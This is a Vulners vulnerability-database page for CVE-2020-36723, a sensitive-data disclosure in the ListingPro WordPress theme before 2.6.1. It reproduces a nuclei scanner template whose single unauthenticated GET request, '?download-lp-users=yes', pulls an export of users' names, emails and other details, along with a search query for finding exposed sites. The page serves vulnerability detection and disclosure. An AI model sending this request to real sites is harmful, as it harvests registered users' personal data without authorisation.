Lucene search
K

ListingPro < 2.6.1 - Sensitive Data Disclosure

šŸ—“ļøĀ 01 Jul 2026Ā 03:36:47Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 16Ā Views

ListingPro before 2.6.1 leaks user data via listingpro-plugin/functions.php.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-36723
7 Jun 202307:29
–circl
CNNVD
WordPress Theme ListingPro - WordPress Directory & Listing å®‰å…Øę¼ę“ž
7 Jun 202300:00
–cnnvd
CVE
CVE-2020-36723
7 Jun 202301:51
–cve
Cvelist
CVE-2020-36723 ListingPro - WordPress Directory & Listing Theme < 2.6.1 - Sensitive Information Disclosure
7 Jun 202301:51
–cvelist
EUVD
EUVD-2020-24165
7 Oct 202500:30
–euvd
NVD
CVE-2020-36723
7 Jun 202302:15
–nvd
OSV
CVE-2020-36723
7 Jun 202302:15
–osv
Prion
Code injection
7 Jun 202302:15
–prion
Positive Technologies
PT-2023-11865
7 Jun 202300:00
–ptsecurity
RedhatCVE
CVE-2020-36723
22 May 202515:35
–redhatcve
Rows per page
id: CVE-2020-36723

info:
  name: ListingPro < 2.6.1 - Sensitive Data Disclosure
  author: ritikchaddha
  severity: high
  description: |
    The ListingPro - WordPress Directory & Listing Theme for WordPress is vulnerable to Sensitive Data Exposure in versions before 2.6.1 via the ~/listingpro-plugin/functions.php file. This makes it possible for unauthenticated attackers to extract sensitive data including usernames, full names, email addresses, phone numbers, physical addresses and user post counts.
  impact: |
    Unauthenticated attackers can extract sensitive user data including usernames, email addresses, phone numbers, and physical addresses from all registered users.
  remediation: |
    Upgrade to ListingPro version 2.6.1 or later.
  reference:
    - https://wpscan.com/vulnerability/096e6e16-c14d-42da-8ba3-c271db3385a4/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-36723
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-36723
    epss-score: 0.01608
    epss-percentile: 0.72878
    cwe-id: CWE-200
    cpe: cpe:2.3:a:cridio:listingpro:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cridio
    product: listingpro
    fofa-query: body="/wp-content/plugins/listingpro"
  tags: cve,cve2020,wordpress,wp-plugin,wp,exposure,listingpro,vuln,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/index.php?download-lp-users=yes"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "UserName"
          - "Email"
          - "Full Name"
          - "Listings"
        condition: and

      - type: word
        part: header
        words:
          - "filename="

      - type: status
        status:
          - 200
# digest: 4a0a004730450220457efb65d917cdf757bf5ffd2b1d0a69c1138f288d1d66fbcee2e5d757b9058e022100901ceab8d8157a967fbfd86b003706f3abbb3cb2b6e57dbcda92c648559d23cc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.15.3
EPSS0.01608
SSVC
16